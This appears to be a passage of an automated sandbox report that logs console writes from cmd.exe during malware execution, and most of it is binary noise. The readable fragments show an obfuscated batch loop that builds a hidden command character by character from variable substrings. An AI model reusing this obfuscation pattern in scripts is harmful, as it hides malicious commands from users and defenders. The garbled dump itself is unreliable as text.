Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.H.D.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.5.,.1.!. .................A..@....A.H.D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.5.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.0.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<......."...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......(...........................".......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...............................<.......(................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......4....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......@...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......G...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......S.............................A..@....A...E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.9.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<......._...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......e..........................._.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.9. .=.=. .9.0. ...k...........................<.......e................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......q....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......}...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.X...X......w..A...1.....7..7........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.,.1.!. ...................A..@....A...E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.X...X......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A...E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. ....."...........................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......(....................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......4...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......;...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......G.............................A..@....A.`.E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.9.,.1.!. .................A..@....A.`.E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......S...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......Y...........................S.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.9. .=.=. .9.0. ..._...........................<.......Y................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......e....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......q...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......x.............................E...A...E...1..`E...A..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.0.,.1.!. .................A..@....A.81E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.0. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.X...X......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A.81E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A.81E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......:...................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...@...........................<.......:................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......F....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......R...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......Y...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......e.............................A..@....A.81E.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.2.,.1.!. .................A..@....A.81E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......q...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......w...........................q.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.2. .=.=. .9.0. ...}...........................<.......w................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.X...X......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.,.1.!. ...................A..@....A.81E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....w..b........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.3.7.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......(...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...................................(.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.7. .=.=. .9.0. ...4...........................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......:....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......F...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......M...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......Y.............................A..@....A..CE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......e...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......k...........................e.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...q...........................<.......k................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......w....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....w..b........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.8.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.3.5.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..UE.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A..UE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<......."...................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...(...........................<......."................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......:...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......A...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......M.............................A..@....A..UE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.3.7.,.1.!. .................A..@....A..UE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......Y...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<......._...........................Y.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.7. .=.=. .9.0. ...e...........................<......._................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......k....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......w...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......~...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..UE.\...\......w..A...1.....7..$........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..UE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.2.,.1.!. .................A..@....A..UE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7.2. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..UE.\...\......w..A...1.....7..$........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.2.,.1.!. .................A..@....A..UE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.2. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<......."....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......5...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......A.............................A..@....A..UE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.3.5.,.1.!. .................A..@....A..UE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......t...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......z...........................t.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.5. .=.=. .9.0. ...............................<.......z................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..UE.\...\......w..A...1.....7..$........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.9.,.1.!. .................A..@....A..UE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
